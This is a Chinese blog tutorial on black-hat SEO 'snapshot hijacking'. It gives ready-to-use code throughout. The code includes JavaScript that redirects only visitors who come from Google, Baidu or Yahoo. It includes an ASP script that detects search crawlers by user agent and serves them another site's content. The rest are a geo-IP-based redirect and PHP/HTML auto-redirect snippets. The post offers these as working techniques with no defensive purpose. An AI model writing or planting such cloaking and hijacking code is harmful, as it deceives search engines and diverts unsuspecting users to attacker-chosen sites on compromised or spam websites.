盒子
盒子
文章目录
  1. 0x00劫持流量:
  2. 0x01快照劫持:
  3. 0x02判断地区劫持流量
  4. 0x03跳转代码参考:
    1. 1.php文件
    2. 2.html文件

黑帽seo基础手法之快照劫持

0x00劫持流量:

从百度来的时候才会跳转,正常输入网址是打开正常的。好,我们先看一下是怎么实现的,上代码:

1
2
3
4
5
6
7
<script LANGUAGE="Javascript">
var s=document.referrer
if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 )
location.href="http://222.com";
else
location.href="indax.php/index.asp/index.html"
</script>

代码解释:if(s.indexOf(“google”)>0 || s.indexOf(“baidu”)>0 || s.indexOf(“yahoo”)>0 ) 判断搜索引擎来源,如果来源正确,location.href=”http:222.cn”;跳转到222.cn网站。下面的代码是如果否,则打开正常首页。这段代码为js代码。只是一个简单的判断。

遗留问题:如果返回本页面将会被不断刷新。

0x01快照劫持:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
<%@ LANGUAGE = VBScript.Encode %><% 
Dim agent
agent=Request.ServerVariables("http_user_agent")
If instr(agent,"Baiduspider") > 0 or instr(agent,"baidubrowser") > 0 or instr(agent,"Sogou") > 0 or instr(agent,"googlebot") > 0 or instr(agent,"Sosospider") > 0 then
linkurl="http://www.xxx.com" *快照网址
Function GetBody(Url)
Dim objXML
On Error Resume Next
Set objXML = CreateObject("Microsoft.XMLHTTP")
With objXML
.Open "Get", Url, False, "", ""
.Send
GetBody = .ResponseBody
End With
GetBody=BytesToBstr(GetBody,"GB2312")
Set objXML = Nothing
End Function
Function BytesToBstr(strBody,CodeBase)
dim objStream
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write strBody
objStream.Position = 0
objStream.Type = 2
objStream.Charset = CodeBase
BytesToBstr = objStream.ReadText
objStream.Close
set objStream = nothing
End Function
response.write GetBody(linkurl)
End if%>
<script LANGUAGE="Javascript">
var s=document.referrer
if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 )
location.href="http://www.baidu.com";
</script>

代码解释:前一段判断抓取蜘蛛来源,指向快照抓取网址;后一段代码判断来路,进行跳转到指定网址。

0x02判断地区劫持流量

1
2
3
4
5
6
7
8
<script src="http://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js" charset="GB2312" ></script>
<script type=text/javascript>
if(remote_ip_info.province ==*江西*){这里指定地区
;这里为空表示不跳转 我们留空表示不跳转
}else{否则
window.location.href="http://www.hao123.com";如果不是上面地区 就跳转到这个网址
}
</script>

代码解释:http://int.dpool.sina.com.cn/iplookup/iplookup.php?format=js 为ip数据识别;其他代码看注释;

0x03跳转代码参考:

1.php文件

1
<?php if(file_exists('3.php')){   include('111.php');}else{ include('222.php');}

代码解释:判断有无3.php,返回true或falst,如果true就到111.php,反之到222.php。

2.html文件

1
2
3
4
5
6
7
<form style='display:none;' id='form1' name='form1' method='post' action=''><input name='apikey' type='text' 

value='1990225' /></form>
<script type="text/javascript">
document.form1.action = "/3.php";
document.form1.submit()
</script>

代码解释:打开直接跳转到3.php。

支持一下
扫一扫,支持cscwdxgg
  • 微信扫一扫
  • 支付宝扫一扫
-------------本文结束感谢您的阅读-------------